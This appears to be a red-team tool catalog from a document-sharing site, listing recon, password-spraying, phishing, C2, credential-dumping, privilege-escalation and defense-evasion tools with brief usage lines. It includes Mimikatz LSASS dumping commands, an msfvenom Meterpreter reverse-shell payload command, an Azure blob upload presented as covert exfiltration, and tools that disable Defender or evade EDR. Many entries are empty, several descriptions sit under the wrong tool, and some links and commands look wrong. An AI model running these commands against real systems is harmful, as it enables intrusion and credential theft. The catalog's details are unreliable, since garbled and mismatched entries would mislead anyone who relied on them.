Professional Documents
Culture Documents
GOVERDHAN KUMAR
RED TEAM TOOLS BY GOVERDHAN KUMAR
INTRODUCTION
Catalog
RECONNAISSANCE 1
1. RustScan: 1
2. NmapAutomator: 1
3. AutoRecon: 1
4. Amass: 1
6. Recon-NG: 2
7. AttackSurfaceMapper: 2
8. DNSDumpster: 2
INITIAL ACCESS 2
1. SprayingToolKit: 2
2. o365Recon: 3
3. Psudohash: 3
4. CredMaster: 3
5. DomainPasswordSpray: 3
6. TheSprayer: 3
7. TREVORspray: 3
DELIVERY 4
1. o365AttackToolKit: 4
2. EvilGinx2: 4
3. GoPhish: 4
4. PwnAuth: 5
5. Modlishka: 5
COMMAND AND CONTROL 5
1. PoshC2: 5
2. Sliver: 5
3. SILENTTRINITY: 6
4. Empire: 6
5. AzureC2Relay: 6
6. Havoc C2: 7
7. Mythic C2: 7
CREDENITIAL DUMPING 7
1. MimiKatz: 7
2. HekaTomb: 8
3. SharpLAPS: 8
4. Net-GPPPassword: 8
5. PyPyKatz: 8
PRIVILEGE ESCALATION 9
1. SharpUp: 9
2. MultiPotato: 9
3. PEASS - Privilege Escalation Awesome Scripts SUITE: 9
4. Watson: 9
5. Bat-Potato: 10
DEFENSE EVASION 10
1. Villain: 10
2. EDRSandBlast: 10
3. SPAWN - Cobalt Strike BOF: 10
4. NetLoader: 11
5. KillDefenderBOF: 11
CONCLUSION 11
RED TEAM TOOLS BY GOVERDHAN KUMAR
RECONNAISSANCE
1. RustScan:
Description: RustScan is a fast port scanner that identifies open ports and services on target
systems quickly.
Installation: You can install RustScan using Rust's package manager, Cargo. Run these commands:
2. NmapAutomator:
3. AutoRecon:
4. Amass:
Description: Amass is a versatile tool for subdomain enumeration and information gathering.
Installation: Download the tool from GitHub repository: https://github.com/OWASP/Amass
Usage: Use commands like `amass enum` and `amass intel` followed by relevant flags and
options.
1
RED TEAM TOOLS BY GOVERDHAN KUMAR
5. CloudEnum:
Description: CloudEnum identifies cloud resources and assets related to a target domain.
Installation: Download from GitHub repository: https://github.com/initstring/cloud_enum
Usage: Run `python3 cloud_enum.py --domain target.com` to perform cloud-based
reconnaissance.
6. Recon-NG:
Description: Recon-NG is a powerful reconnaissance framework that gathers data from various
sources.
Installation: It's pre-installed in Kali Linux. For other systems, follow the guide here:
https://github.com/lanmaster53/recon-ng
Usage: Launch `recon-ng` and execute modules using commands like `use`, `options`, and `run`.
7. AttackSurfaceMapper:
8. DNSDumpster:
Description: DNSDumpster is an online tool for finding DNS information and subdomains.
Usage: Visit the website https://dnsdumpster.com/ , enter the target domain, and analyze the
results.
INITIAL ACCESS
1. SprayingToolKit:
2
RED TEAM TOOLS BY GOVERDHAN KUMAR
2. o365Recon:
3. Psudohash:
Description: Psudohash generates password candidates using permutations and rules for
password cracking.
Installation: Download from GitHub repository: https://github.com/DominicBreuker/psudohash
Usage: Run ` psudohash -p password_rules.txt -r rules.txt ` to create password permutations.
4. CredMaster:
Description: CredMaster is a tool for crafting malicious documents to capture credentials during
phishing attacks.
Installation: Download from GitHub repository: https://github.com/0xZDH/CredMaster
Usage: Edit `CredMaster.py` with your settings and run it using `python3 CredMaster.py`.
5. DomainPasswordSpray:
6. TheSprayer:
7. TREVORspray:
Description: TREVORspray is a password spraying tool designed for Office 365 environments.
3
RED TEAM TOOLS BY GOVERDHAN KUMAR
DELIVERY
1. o365AttackToolKit:
2. EvilGinx2:
Description: EvilGinx2 is a tool for advanced phishing attacks, capturing credentials through
browser-based techniques.
Installation: Download from GitHub repository: https://github.com/kgretzky/evilginx2
Usage:
Configure the config.yaml file to set up target domains and phishing scenarios.
To start the server:
python3 evilginx.py -p config.yaml
The tool acts as a proxy, capturing credentials as users interact with the phishing pages.
3. GoPhish:
Description: GoPhish is an open-source phishing framework that enables you to create and
manage phishing campaigns.
Installation: Download from GitHub repository: https://github.com/gophish/gophish
Usage:
Start the GoPhish server:
./gophish
Access the GoPhish web interface and create a new campaign.
Customize email templates, landing pages, and other campaign details.
Launch the campaign and monitor the results through the dashboard.
4
RED TEAM TOOLS BY GOVERDHAN KUMAR
4. PwnAuth:
Description: PwnAuth is a tool for performing password spraying and credential stuffing attacks
against authentication services.
Installation: Download from GitHub repository: https://github.com/fireeye/PwnAuth
Usage:
Configure the config.yaml file with target URLs and other settings.
To perform a password spraying attack:
./pwnauth.py -c config.yaml --password-list passwords.txt
The tool will attempt to authenticate using the provided passwords against the target URLs.
5. Modlishka:
Description: Modlishka is a reverse proxy tool that automates phishing attacks, capturing user
credentials through an authentic-looking interface.
Installation: Download from GitHub repository: https://github.com/drk1wi/Modlishka
Usage:
Configure the config.cfg file with target domain and redirect URL.
To start Modlishka:
./modlishka -config config.cfg
Modlishka acts as a reverse proxy, intercepting user traffic and capturing credentials.
1. PoshC2:
Description: PoshC2 is a post-exploitation framework that allows you to establish command and
control channels with compromised systems.
Installation: Download from GitHub repository: https://github.com/nettitude/PoshC2
Usage:
Set up the config.yaml file with your preferences.
Start the PoshC2 server:
./PoshC2.py
Use the PoshC2 client for controlling compromised hosts and managing your post-
exploitation activities.
2. Sliver:
5
RED TEAM TOOLS BY GOVERDHAN KUMAR
Usage:
Configure the config file with your settings.
Start the Sliver server:
./sliver
Use the Sliver client for controlling compromised hosts and performing post-exploitation
actions.
3. SILENTTRINITY:
4. Empire:
Description: Empire is a powerful post-exploitation framework that offers various modules for
controlling and managing compromised systems.
Installation: Download from GitHub repository: https://github.com/BC-SECURITY/Empire
Usage:
Start the Empire server:
./empire
Access the Empire web interface using a web browser (default: https://localhost:1337) to
manage agents and launch modules.
Example: Launch a PowerShell module on a compromised host:
usemodule management/psinject
set Name MyScript
set Listener http
set Agent 1
set Command "Write-Host 'Hello from Empire'"
execute.
5. AzureC2Relay:
Description: AzureC2Relay is a tool for setting up covert channels using Azure services for
command and control purposes.
Installation:
Download from GitHub repository: https://github.com/redcanaryco/atomic-red-
team/blob/master/atomics/T1105.002/AzureC2Relay.md
Follow the detailed instructions provided in the repository.
Usage:
Configure the Azure resources as per the instructions in the repository.
Deploy and utilize the AzureC2Relay to establish covert channels.
Example: Use the covert channel for data exfiltration:
6
RED TEAM TOOLS BY GOVERDHAN KUMAR
az login
az storage blob upload --account-name <storage_account> --account-key
<storage_key> -- container-name <container_name> --name <blob_name> --type
block --source <local_file_path>
6. Havoc C2:
Description: Havoc C2 is a cross-platform C2 server and agent for managing and controlling
compromised systems.
Installation: Download from GitHub repository: https://github.com/cobbr/Havoc
Usage:
Follow the repository's README for installation and configuration.
Start the Havoc C2 server and deploy agents on compromised hosts.
Example: Start the Havoc C2 server and deploy an agent:
./havoc -l <listening_ip> -p <listening_port>
python3 havoc-cli.py -t <target_ip> -a <agent_name>
7. Mythic C2:
CREDENITIAL DUMPING
1. MimiKatz:
Description: MimiKatz extracts plaintext passwords and hashes from memory or registry, aiding
in credential theft.
Installation: Download from GitHub repository: https://github.com/gentilkiwi/mimikatz
Usage:
Build MimiKatz by running:
make
Extract credentials from memory:
7
RED TEAM TOOLS BY GOVERDHAN KUMAR
sekurlsa::logonpasswords
Extract credentials from LSASS process:
sekurlsa::minidump lsass.dmp
2. HekaTomb:
Description: HekaTomb is a toolset for dumping Windows credentials from memory using
various techniques.
Installation: Download from GitHub repository: https://github.com/Technowlogy-
Pushpender/hekatomb
Usage:
Dump credentials using Mimikatz-like commands:
hekatomb.py procdump lsass
Extract credentials from LSASS dump:
hekatomb.py parse lsass_dump.dmp
3. SharpLAPS:
4. Net-GPPPassword:
5. PyPyKatz:
Description: PyPyKatz is a Python library and toolset for parsing and interacting with LSA secrets
in memory dumps.
Installation: Download from GitHub repository: https://github.com/skelsec/pypykatz
Usage:
Install dependencies:
pip install -r requirements.txt
Parse LSA secrets from a memory dump:
pypykatz lsa minidump lsass.dmp
8
RED TEAM TOOLS BY GOVERDHAN KUMAR
PRIVILEGE ESCALATION
1. SharpUp:
Description: SharpUp is a tool that helps identify potential privilege escalation paths by
querying system information.
Installation: Download from GitHub repository: https://github.com/GhostPack/SharpUp
Usage:
Build SharpUp:
csc.exe /out:SharpUp.exe /platform:x64 /target:exe SharpUp.cs
Execute SharpUp:
SharpUp.exe all
2. MultiPotato:
Description: PEASS is a suite of scripts designed to help with Windows privilege escalation.
Installation: Download from GitHub repository: https://github.com/carlospolop/privilege-
escalation-awesome-scripts-suite
Usage:
Navigate to the specific technique's directory, e.g., Windows-Exploit-Suggester.
Run the script to identify potential vulnerabilities:
./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2021-08-11-mssb.xls --systeminfo systeminfo.txt
4. Watson:
9
RED TEAM TOOLS BY GOVERDHAN KUMAR
Usage:
Run Watson
Watson.exe
5. Bat-Potato:
Description: Bat-Potato is a Windows Privilege Escalation tool that helps automate common
privilege escalation methods.
Installation: Download from GitHub repository: https://github.com/EmpireProject/Bat-Potato
Usage:
Run Bat-Potato:
powershell.exe -ExecutionPolicy Bypass -File bat-potato.ps1
DEFENSE EVASION
1. Villain:
Description: Villain is a tool for bypassing security measures, like AV and EDR, by modifying
existing executables.
Installation: Download from GitHub repository: https://github.com/edwardz246003/Villain
Usage: Follow the instructions provided in the repository's README to install and utilize the tool.
python3 villain.py -i input.exe -o output.exe
2. EDRSandBlast:
Description: SPAWN is a Cobalt Strike Beacon Object File (BOF) that helps evade EDR solutions.
Installation: Download from GitHub repository: https://github.com/r3dQu1nn/SPAWN
Usage: Follow the instructions in the README for building and using the BOF with Cobalt Strike.
10
RED TEAM TOOLS BY GOVERDHAN KUMAR
4. NetLoader:
Description: NetLoader is a technique to load shellcode via a .NET assembly to evade security
mechanisms.
Installation: Download from GitHub repository: https://github.com/Flangvik/NetLoader
Usage:
Create a custom .NET assembly containing your shellcode:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=your_port -f csharp >
hellcode.cs
5. KillDefenderBOF:
Description: KillDefenderBOF is a Cobalt Strike Beacon Object File (BOF) that attempts to disable
Windows Defender.
Installation: Download from GitHub repository:
https://github.com/edwardz246003/KillDefenderBOF
Usage: Refer to the repository's README for building and using the BOF with Cobalt Strike.
CONCLUSION
In the realm of offensive security operations, a diverse toolkit is essential for effective red teaming.
This compilation presents a wide array of tools categorized by their functions, enabling security
professionals to carry out thorough assessments and simulations. From reconnaissance and initial
access to delivery, command and control, credential dumping, privilege escalation, and defense
evasion, each tool plays a crucial role in the red teaming process.
It's important to emphasize that these tools should only be used in ethical and authorized contexts,
ensuring that no harm is caused to legitimate systems or networks. Ethical hacking and penetration
testing help organizations identify vulnerabilities, improve defenses, and ultimately enhance overall
cybersecurity posture.
As the landscape of cybersecurity continues to evolve, the knowledge and skills to responsibly wield
these tools become increasingly valuable. Remember, the success of red teaming lies not just in the
tools themselves, but in the expertise, strategy, and ethical considerations that guide their application.
Follow :
https://www.linkedin.com/in/goverdhankumar
https://github.com/wh04m1i
https://linktr.ee/g0v3rdh4n
https://instagram.com/who4m1i
11
RED TEAM TOOLS BY GOVERDHAN KUMAR
12